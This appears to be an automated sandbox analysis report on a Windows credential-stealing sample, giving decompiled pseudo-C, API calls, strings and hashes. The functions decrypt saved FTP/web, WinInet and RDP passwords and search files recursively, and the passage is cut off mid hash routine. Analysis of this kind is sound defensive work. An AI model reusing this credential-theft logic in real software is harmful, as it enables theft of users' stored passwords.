Opcode ID: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
Instruction ID: d2a922008bdebd86f42a8708ca9441522aabe83a0fc08158bea3eb6d75d48dad
Opcode Fuzzy Hash: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
Instruction Fuzzy Hash: A741187190021CEADF219E50CC42FDABAB9BF08304F04C0A6F644750D0DBB69AE59FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC36, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040BC36(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				int _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t54;
				void* _t55;
				int _t73;
				int _t75;
				int _t76;

				_t54 = __eax;
				if(_a16 == 0 ||  *0x414b43 == 0) {
					return _t54;
				} else {
					_t55 = _a16;
					__eflags =  *0x418e9c - _t55; // 0x0
					if(__eflags < 0) {
						__eflags =  *0x418ea0 - _t55; // 0x5
						if(__eflags < 0) {
							__eflags =  *0x418ea4 - _t55; // 0x3
							if(__eflags < 0) {
								E0040B552(_a12,  *0x418e9c,  &_v8,  &_v12,  &_v16);
								E0040B552(_a12,  *0x418ea4,  &_v20,  &_v24,  &_v28);
								E0040B552(_a12,  *0x418ea0,  &_v32,  &_v36,  &_v40);
								_push(_v32);
								_pop( *_t16);
								_push(_v40);
								_pop( *_t18);
								_v52 = 0;
								_t55 =  *0x414b43( &_v48, 0, 0, 0, 0, 1,  &_v56);
								__eflags = _t55;
								if(_t55 != 0) {
									__eflags = _v52;
									if(_v52 != 0) {
										__eflags = _v56 - _v32;
										if(_v56 <= _v32) {
											asm("cld");
											asm("jecxz 0x4");
											memcpy(_v40, _v52, _v56);
											_push(_v56);
											_pop( *_t29);
											_t55 = LocalFree(_v52);
											__eflags = _v8;
											if(_v8 != 0) {
												__eflags = _v20;
												if(_v20 != 0) {
													__eflags = _v32;
													if(_v32 != 0) {
														_v60 = E004018CF(_v8);
														_t73 = E00401906(_v16, _v60, _v8);
														_push("ftp://");
														L0041066A();
														_t75 = StrCmpNIA(_v60, "ftp://", _t73);
														__eflags = _t75;
														if(_t75 != 0) {
															_push("http://");
															L0041066A();
															_t75 = StrCmpNIA(_v60, "http://", _t75);
														}
														_t76 = _t75;
														__eflags = _t76;
														if(_t76 != 0) {
															_push("https://");
															L0041066A();
															_t76 = StrCmpNIA(_v60, "https://", _t76);
														}
														__eflags = _t76;
														if(_t76 == 0) {
															E00401569(_a8, 0xbeef0000);
															E00401569(_a8,  *0x418e98);
															E0040159F(_a8, _v16, _v8);
															E0040159F(_a8, _v28, _v20);
															E0040159F(_a8, _v40, _v32);
														}
														return E004018B8(_v60);
													}
												}
											}
										}
									}
								}
							}
						}
					}
					return _t55;
				}
			}

0x0040bc36
0x0040bc42
0x0040bc50
0x0040bc53
0x0040bc53
0x0040bc56
0x0040bc5c
0x0040bc62
0x0040bc68
0x0040bc6e
0x0040bc74
0x0040bc8f
0x0040bca9
0x0040bcc3
0x0040bcc8
0x0040bccb
0x0040bcce
0x0040bcd1
0x0040bcd4
0x0040bcf3
0x0040bcf3
0x0040bcf5
0x0040bcfb
0x0040bcff
0x0040bd08
0x0040bd0b
0x0040bd11
0x0040bd1b
0x0040bd1d
0x0040bd1f
0x0040bd22
0x0040bd28
0x0040bd2d
0x0040bd31
0x0040bd37
0x0040bd3b
0x0040bd41
0x0040bd45
0x0040bd53
0x0040bd5f
0x0040bd64
0x0040bd69
0x0040bd7c
0x0040bd7c
0x0040bd7e
0x0040bd80
0x0040bd85
0x0040bd93
0x0040bd93
0x0040bd98
0x0040bd98
0x0040bd9a
0x0040bd9c
0x0040bda1
0x0040bdaf
0x0040bdaf
0x0040bdb4
0x0040bdb6
0x0040bdc0
0x0040bdce
0x0040bddc
0x0040bdea
0x0040bdf8
0x0040bdf8
0x00000000
0x0040be00
0x0040bd45
0x0040bd3b
0x0040bd31
0x0040bd0b
0x0040bcff
0x0040bcf5
0x0040bc74
0x0040bc68
0x0040be08
0x0040be08

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
LocalFree.KERNEL32(00000000,?), ref: 0040BD28
lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF

Strings

http://, xrefs: 0040BD80, 0040BD8B
https://, xrefs: 0040BD9C, 0040BDA7
ftp://, xrefs: 0040BD64, 0040BD6F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 16666fb40e7306a47e8451c35a35ac53ab369c7cfa398845364db40496014646
Instruction ID: e50de70f366a9a73352d6ba0206718c11b41da89e4af0f10d66e37424ec97bcb
Opcode Fuzzy Hash: 16666fb40e7306a47e8451c35a35ac53ab369c7cfa398845364db40496014646
Instruction Fuzzy Hash: 8A51EB31910109FADF11AB91DC41EEEBB7AFF48318F14403AF611B11A1D7799A90DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00408961, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
filestringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408961(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8, char* _a12) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t36;
				signed int _t38;
				CHAR* _t40;
				void* _t44;
				char* _t47;
				int _t50;
				signed int _t51;
				char** _t53;
				signed int _t55;
				void* _t57;
				void* _t66;
				void* _t67;
				signed int* _t68;
				void* _t72;

				_t72 = __edi;
				_t67 = __ecx;
				_t66 = __ebx;
				_v332 = 0;
				_t36 = _a8;
				if(_t36 == 0 ||  *_t36 == 0) {
					L20:
					return E004018B8(_v332);
				} else {
					_t38 = E004025A9(_a8);
					_t39 = _t38;
					__eflags = _t38;
					if(_t38 != 0) {
						_t40 = E00401DF8(_t39, _a8, "*.*");
					} else {
						_t40 = E00401DF8(_t39, _a8, "\*.*");
					}
					_v332 = _t40;
					E004018E6( &_v322, 0x13e);
					_t44 = FindFirstFileA(_v332,  &_v322);
					_v328 = _t44;
					__eflags = _t44 + 1;
					if(_t44 + 1 != 0) {
						do {
							_t68 =  &_v322;
							__eflags =  *_t68 & 0x00000010;
							if(( *_t68 & 0x00000010) == 0) {
								_v336 =  &(_t68[0xb]);
								_t47 = StrStrIA(_v336, _a12);
								_t48 = _t47;
								__eflags = _t47;
								if(_t47 != 0) {
									E0040891C(_t66, _t67, _t68, _t72, __eflags, _a4, E00401E4C(E00401DF8(_t48, _a8, "\\"), _t62, _v336));
									E004018B8(_t63);
								}
							} else {
								_t51 =  &(_t68[0xb]);
								_push(_t51);
								_push(0x414f84);
								L00410712();
								__eflags = _t51;
								if(_t51 != 0) {
									_t53 =  &( &_v322->cFileName);
									_push(_t53);
									_push(0x414f86);
									L00410712();
									__eflags = _t53;
									if(_t53 != 0) {
										_t55 = E004025A9(_a8);
										_t56 = _t55;
										__eflags = _t55;
										if(_t55 != 0) {
											_t57 = E00401DF8(_t56, _a8, 0);
										} else {
											_t57 = E00401DF8(_t56, _a8, "\\");
										}
										E00408961(_t66, _t67, _t72, _a4, E00401E4C(_t57, _t57,  &( &_v322->cFileName)), _a12);
										E004018B8(_t58);
									}
								}
							}
							_t50 = FindNextFileA(_v328,  &_v322);
							__eflags = _t50;
						} while (_t50 != 0);
						FindClose(_v328);
					}
					goto L20;
				}
			}

0x00408961
0x00408961
0x00408961
0x0040896a
0x00408977
0x00408979
0x00408ad6
0x00408ae2
0x00408985
0x00408988
0x0040898d
0x0040898d
0x0040898f
0x004089a8
0x00408991
0x00408999
0x00408999
0x004089ad
0x004089bf
0x004089d1
0x004089d6
0x004089dc
0x004089dd
0x004089e3
0x004089e3
0x004089e9
0x004089ef
0x00408a71
0x00408a80
0x00408a85
0x00408a85
0x00408a87
0x00408aa7
0x00408aac
0x00408aac
0x004089f1
0x004089f1
0x004089f4
0x004089f5
0x004089fa
0x004089ff
0x00408a01
0x00408a0e
0x00408a11
0x00408a12
0x00408a17
0x00408a1c
0x00408a1e
0x00408a28
0x00408a2d
0x00408a2d
0x00408a2f
0x00408a45
0x00408a31
0x00408a39
0x00408a39
0x00408a62
0x00408a67
0x00408a67
0x00408a1e
0x00408a01
0x00408abe
0x00408ac3
0x00408ac3
0x00408ad1
0x00408ad1
0x00000000
0x004089dd

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
lstrcmpi.KERNEL32(00414F84,?), ref: 004089FA
lstrcmpi.KERNEL32(00414F86,?), ref: 00408A17
FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

*.*, xrefs: 004089A0
\*.*, xrefs: 00408991

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 93c6d3b74171b0ec779853f72d136b32b6b8433b99017211a0ae1c5e3eb0744c
Instruction ID: 5ea2f1443042eb35dbb5eee109b5069dc3daeb25fe79f4f70908f7877fe18fba
Opcode Fuzzy Hash: 93c6d3b74171b0ec779853f72d136b32b6b8433b99017211a0ae1c5e3eb0744c
Instruction Fuzzy Hash: 6A317E70A00209AEDF10BF61CD42FEE7769AF40304F1041BBF458B51E2DB789AD1AE59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A96D, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
lstrlenW.KERNEL32(00416369,?,?,00000000), ref: 0040AA1D
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
LocalFree.KERNEL32(00000000), ref: 0040AA7F
CredFree.ADVAPI32(00000000), ref: 0040AA9D

Strings

Microsoft_WinInet_*, xrefs: 0040A9DA
icA, xrefs: 0040A987

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*$icA
API String ID: 3891647360-3506372221
Opcode ID: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
Instruction ID: ec4eec63bcc124374d5f2d7e6b4d46d77861198517d8893598619f99e1c26cfb
Opcode Fuzzy Hash: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
Instruction Fuzzy Hash: 9C312D71A00209EADF21CF84DD05BEEB7B4EB44315F15443AE951B61D0D3BC9A94CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040CE3D(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				signed char _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t47;
				signed char _t52;
				signed char _t54;
				signed char _t58;
				signed char _t63;
				signed char _t64;
				char _t65;

				if( *0x414b43 != 0) {
					_t40 = E00401FFD(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E00402091( &_v20);
						}
						_t43 = E004023A8(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E0040CD6B("username:s:", _v12, _v8);
						_v28 = E0040CD6B("password 51:b:", _v12, _v8);
						_t47 = E0040CD6B("full address:s:", _v12, _v8);
						_v32 = _t47;
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E004018B8(_v24);
							E004018B8(_v28);
							E004018B8(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_push(_v28);
							L0041066A();
							_t63 = _t47 >> 1;
							_push(_t63);
							while(1) {
								_t64 = _t63;
								__eflags = _t64;
								if(_t64 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t47 - 0x30;
								if(_t47 < 0x30) {
									L12:
									_t52 = _t47 - 0x41 + 0xa;
									__eflags = _t52;
									L13:
									__eflags = _t52 - 0x30;
									if(_t52 < 0x30) {
										L16:
										_t54 = _t52 - 0x41 + 0xa;
										__eflags = _t54;
										L17:
										_t47 = _t54 << 0x00000004 | _t54 << 0x00000004;
										asm("stosb");
										_t63 = _t64 - 1;
										__eflags = _t63;
										continue;
									}
									__eflags = _t52 - 0x39;
									if(_t52 > 0x39) {
										goto L16;
									}
									_t54 = _t52 - 0x30;
									goto L17;
								}
								__eflags = _t47 - 0x39;
								if(_t47 > 0x39) {
									goto L12;
								}
								_t52 = _t47 - 0x30;
								goto L13;
							}
							_pop(_t65);
							_v40 = _t65;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t58 =  *0x414b43( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t58;
							if(_t58 != 0) {
								__eflags = _v44;
								if(__eflags != 0) {
									E0040CC29(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}

0x0040ce4c
0x0040ce60
0x0040ce60
0x0040ce62
0x0040ce68
0x0040ce6f
0x0040cf8c
0x00000000
0x0040cf90
0x0040ce7b
0x0040ce80
0x0040ce82
0x00000000
0x00000000
0x0040ce98
0x0040ceab
0x0040ceb9
0x0040cebe
0x0040cec1
0x0040cec5
0x0040cf74
0x0040cf77
0x0040cf7f
0x0040cf87
0x00000000
0x0040cf87
0x0040cecb
0x0040cecf
0x00000000
0x00000000
0x0040ced5
0x0040ced9
0x0040cedf
0x0040cee2
0x0040ceee
0x0040cef0
0x0040cf21
0x0040cf21
0x0040cf21
0x0040cf23
0x00000000
0x00000000
0x0040cef3
0x0040cef5
0x0040cef7
0x0040cf01
0x0040cf03
0x0040cf03
0x0040cf05
0x0040cf05
0x0040cf08
0x0040cf14
0x0040cf17
0x0040cf17
0x0040cf1a
0x0040cf1d
0x0040cf1f
0x0040cf20
0x0040cf20
0x00000000
0x0040cf20
0x0040cf0a
0x0040cf0d
0x00000000
0x00000000
0x0040cf0f
0x00000000
0x0040cf0f
0x0040cef9
0x0040cefb
0x00000000
0x00000000
0x0040cefd
0x00000000
0x0040cefd
0x0040cf25
0x0040cf26
0x0040cf29
0x0040cf2c
0x0040cf2f
0x0040cf48
0x0040cf4e
0x0040cf50
0x0040cf52
0x0040cf56
0x0040cf67
0x0040cf6f
0x0040cf6f
0x0040cf56
0x0040cf50
0x00000000
0x0040ced9
0x0040cf98
0x0040ce51
0x0040ce51
0x0040ce51

APIs

lstrlen.KERNEL32(00000000), ref: 0040CEE2
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
LocalFree.KERNEL32(00000000), ref: 0040CF6F

Strings

password 51:b:, xrefs: 0040CEA1
full address:s:, xrefs: 0040CEB4
username:s:, xrefs: 0040CE8E

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
Instruction ID: 54cf008bb3eae58b1a30e6a5af3c8a5bf0615ee99b7eb6d7c5b05f7a3dd5831b
Opcode Fuzzy Hash: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
Instruction Fuzzy Hash: FE414F3190010AEADF11ABE5C886BEEBF76EF44714F10423BE601711E1D7794A92DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB24, Relevance: 4.6, APIs: 3, Instructions: 121
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040AB24(unsigned int __eax, void* _a4, unsigned int* _a8) {
				void* _v8;
				char _v12;
				void* _v16;
				int _v20;
				unsigned int _t23;
				intOrPtr _t25;
				void* _t28;
				unsigned int _t45;
				unsigned int _t46;
				intOrPtr* _t56;

				 *_a8 = 0;
				_push(_a4);
				L0041066A();
				if(__eax > 1) {
					_t23 = __eax >> 1;
					 *_a8 = _t23;
					_t45 = _t23;
					if(_t23 < 0) {
						L25:
						return 0;
					} else {
						_t56 = _a4;
						while(1) {
							_t46 = _t45;
							if(_t46 == 0) {
								break;
							}
							_t25 =  *_t56;
							if(_t25 < 0x30 || _t25 > 0x39) {
								if(_t25 < 0x41 || _t25 > 0x46) {
									return 0;
								} else {
									_t28 = _t25 - 0x41 + 0xa;
									goto L11;
								}
							} else {
								_t28 = _t25 - 0x30;
								L11:
								if(_t28 < 0x30 || _t28 > 0x39) {
									if(_t28 < 0x41 || _t28 > 0x46) {
										return 0;
									} else {
										goto L18;
									}
								} else {
									L18:
									asm("stosb");
									_t45 = _t46 - 1;
									_t56 = _t56 + 2;
									continue;
								}
							}
							goto L26;
						}
						 *_t7 =  *_a8;
						_push(_a4);
						_pop( *_t9);
						_v16 = 0;
						if( *0x414b43 == 0) {
							goto L25;
						} else {
							_push( &_v20);
							_push(1);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v12);
							if( *0x414b43() == 0 || _v16 == 0 || _v20 >  *_a8) {
								goto L25;
							} else {
								asm("cld");
								asm("jecxz 0x4");
								memcpy(_a4, _v16, _v20);
								_push(_v20);
								_pop( *__eax);
								LocalFree(_v16);
								return 1;
							}
						}
					}
				} else {
					return 0;
				}
				L26:
			}

0x0040ab30
0x0040ab36
0x0040ab39
0x0040ab41
0x0040ab4c
0x0040ab51
0x0040ab53
0x0040ab55
0x0040ac35
0x0040ac3b
0x0040ab5b
0x0040ab5b
0x0040abbd
0x0040abbd
0x0040abbf
0x00000000
0x00000000
0x0040ab63
0x0040ab69
0x0040ab78
0x0040ab8d
0x0040ab7f
0x0040ab82
0x00000000
0x0040ab82
0x0040ab70
0x0040ab70
0x0040ab90
0x0040ab92
0x0040ab9e
0x0040abb0
0x0040aba4
0x00000000
0x0040aba6
0x0040ab98
0x0040abb3
0x0040abb8
0x0040abb9
0x0040abba
0x00000000
0x0040abba
0x0040ab92
0x00000000
0x0040ab69
0x0040abc6
0x0040abc9
0x0040abcc
0x0040abcf
0x0040abdd
0x00000000
0x0040abdf
0x0040abe2
0x0040abe3
0x0040abe5
0x0040abe7
0x0040abe9
0x0040abeb
0x0040abf0
0x0040abf9
0x00000000
0x0040ac0b
0x0040ac0b
0x0040ac15
0x0040ac17
0x0040ac1c
0x0040ac1f
0x0040ac24
0x0040ac32
0x0040ac32
0x0040abf9
0x0040abdd
0x0040ab43
0x0040ab49
0x0040ab49
0x00000000

APIs

lstrlen.KERNEL32(?), ref: 0040AB39
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
LocalFree.KERNEL32(00000000), ref: 0040AC24

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
Instruction ID: 9475b3dff48bb3a680590f8f4b8fbf70d62397470b3612e928ce05771e3a80a2
Opcode Fuzzy Hash: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
Instruction Fuzzy Hash: C731C7776042099FEF209E58D844BCDB776EB85374F504133DB51A72C4D2BCAA92CA4E

Uniqueness

Uniqueness Score: -1.00%

Function 004044D2, Relevance: 4.6, APIs: 3, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004044D2() {
				struct _SID_IDENTIFIER_AUTHORITY _v10;
				void* _v16;
				long _v20;
				char* _t16;
				int _t20;

				if( *0x414aff != 0 &&  *0x414b03 != 0 &&  *0x414b07 != 0) {
					_t16 =  &_v10;
					 *_t16 = 0;
					 *((char*)(_t16 + 1)) = 0;
					 *((char*)(_t16 + 2)) = 0;
					 *((char*)(_t16 + 3)) = 0;
					 *((char*)(_t16 + 4)) = 0;
					 *((char*)(_t16 + 5)) = 5;
					_t20 = AllocateAndInitializeSid( &_v10, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16);
					if(_t20 != 0) {
						_v20 = 0;
						_push( &_v20);
						_push(_v16);
						_push(0);
						if( *0x414b03() == 0) {
							_v20 = 0;
						}
						FreeSid(_v16);
						return _v20;
					} else {
						return _t20;
					}
				} else {
					return 1;
				}
			}

0x004044df
0x004044fa
0x004044fd
0x00404500
0x00404504
0x00404508
0x0040450c
0x00404510
0x00404537
0x00404539
0x0040453d
0x00404547
0x00404548
0x0040454b
0x00404555
0x00404557
0x00404557
0x00404561
0x0040456b
0x0040453c
0x0040453c
0x0040453c
0x004044f3
0x004044f9
0x004044f9

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
FreeSid.ADVAPI32(?), ref: 00404561

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
Instruction ID: e42ff38ce7fd43cd37d3952dc6f34b3e9485a0eb1960dbb1a6bbd8e72996f532
Opcode Fuzzy Hash: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
Instruction Fuzzy Hash: AA114470504249EEEB11CB94DC1DB9EBBF4AB50309F05C0B5D154AB2E1D3B9E908C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004043DC, Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
LocalFree.KERNEL32(00000000), ref: 0040445C

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
Instruction ID: d6296d7f62e99f81d38af1605d697d2135ce95648fdc9c4461f15ac0c6790018
Opcode Fuzzy Hash: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
Instruction Fuzzy Hash: 0C112875A00218EBDF118E94DC44BDEBB74FB84361F448466FA21662D0C378AA40CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00402EFD, Relevance: .5, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00402EFD(void* __eax, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
				char _v8;
				signed int _t211;
				signed int _t214;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed int _t275;
				signed int _t278;
				signed int _t281;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				signed int _t293;
				signed int _t296;
				signed int _t299;
				signed int _t302;
				signed int _t306;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				signed int _t324;
				signed int _t327;
				signed int _t330;
				signed int _t333;
				signed int _t336;
				signed int _t339;
				signed int _t342;
				signed int _t345;
				signed int _t348;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t358;
				signed int _t361;
				signed int _t364;
				signed int _t367;
				signed int _t370;
				signed int _t373;
				signed int _t376;
				signed int _t379;
				signed int _t382;
				signed int _t385;
				signed int _t388;
				signed int _t391;
				signed int _t394;
				signed int _t397;
				signed int _t400;
				signed int _t403;
				intOrPtr* _t404;
				intOrPtr* _t645;

				_t645 = _a8;
				_t404 = _a4;
				_v8 = _a12;
				do {
					_t257 =  *(_t404 + 4);
					_t306 =  *(_t404 + 8);
					_t355 =  *(_t404 + 0xc);
					asm("rol eax, 0x7");
					_t211 = ((_t306 ^ _t355) & _t257 ^ _t355) +  *_t404 - 0x28955b88 +  *_t645 + _t257;
					asm("rol edx, 0xc");
					_t358 = ((_t257 ^ _t306) & _t211 ^ _t306) + _t355 - 0x173848aa +  *((intOrPtr*)(_t645 + 4)) + _t211;
					asm("rol ecx, 0x11");
					_t309 = ((_t211 ^ _t257) & _t358 ^ _t257) + _t306 + 0x242070db +  *((intOrPtr*)(_t645 + 8)) + _t358;
					asm("rol ebx, 0x16");
					_t260 = ((_t358 ^ _t211) & _t309 ^ _t211) + _t257 - 0x3e423112 +  *((intOrPtr*)(_t645 + 0xc)) + _t309;
					asm("rol eax, 0x7");
					_t214 = ((_t309 ^ _t358) & _t260 ^ _t358) + _t211 - 0xa83f051 +  *((intOrPtr*)(_t645 + 0x10)) + _t260;
					asm("rol edx, 0xc");
					_t361 = ((_t260 ^ _t309) & _t214 ^ _t309) + _t358 + 0x4787c62a +  *((intOrPtr*)(_t645 + 0x14)) + _t214;
					asm("rol ecx, 0x11");
					_t312 = ((_t214 ^ _t260) & _t361 ^ _t260) + _t309 - 0x57cfb9ed +  *((intOrPtr*)(_t645 + 0x18)) + _t361;
					asm("rol ebx, 0x16");
					_t263 = ((_t361 ^ _t214) & _t312 ^ _t214) + _t260 - 0x2b96aff +  *((intOrPtr*)(_t645 + 0x1c)) + _t312;
					asm("rol eax, 0x7");
